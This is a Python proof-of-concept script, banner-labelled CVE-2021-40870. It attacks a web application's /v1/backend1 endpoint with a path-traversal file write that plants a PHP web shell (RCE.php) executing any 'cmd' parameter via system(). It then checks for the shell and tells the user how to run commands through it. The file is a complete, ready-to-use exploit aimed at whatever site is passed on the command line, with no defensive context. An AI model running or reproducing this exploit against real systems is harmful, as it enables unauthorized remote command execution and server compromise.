poc.py

import requests
import json
import sys
import time
from requests.packages import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

banner = '''

   ___         __    ____   ___ ____  _       _  _    ___   ___ _____ ___  
  / __\/\   /\/__\  |___ \ / _ \___ \/ |     | || |  / _ \ ( _ )___  / _ \ 
 / /   \ \ / /_\_____ __) | | | |__) | |_____| || |_| | | |/ _ \  / / | | |
/ /___  \ V //_|_____/ __/| |_| / __/| |_____|__   _| |_| | (_) |/ /| |_| |
\____/   \_/\__/    |_____|\___/_____|_|        |_|  \___/ \___//_/  \___/

                                                        [by 0xAgun]

                     Use : python3 poc.py https://site.com/
                                                                           

'''
print(banner)

base_url = sys.argv[1]
user = '''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'''
filename = "RCE.php"
shell = '''<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>'''
if base_url.startswith('https://'):
    k = base_url.replace("https://", "")
    if k.endswith("/"):
        p = k.replace("/", "")

headers = {
    "Host": p,
    "User-Agent": user,
    "Connection": "close",
    "Content-Length": "109",
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept-Encoding": "gzip",

}

body = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{filename}&data=poc by agun{shell}'


r = requests.post(base_url+'/v1/backend1', headers=headers, data=body, verify=False)

check_file = requests.get(base_url+'/v1/'+filename, verify=False)
if check_file.status_code == 200:
    print(f'EXPLOITED {base_url}')
    print('')
    print(f'Go To {base_url}/v1/{filename}')
    print('')
    print('access shell using RCE.php?cmd=[command]')
else:
    print("Sorry Dude Bad luck")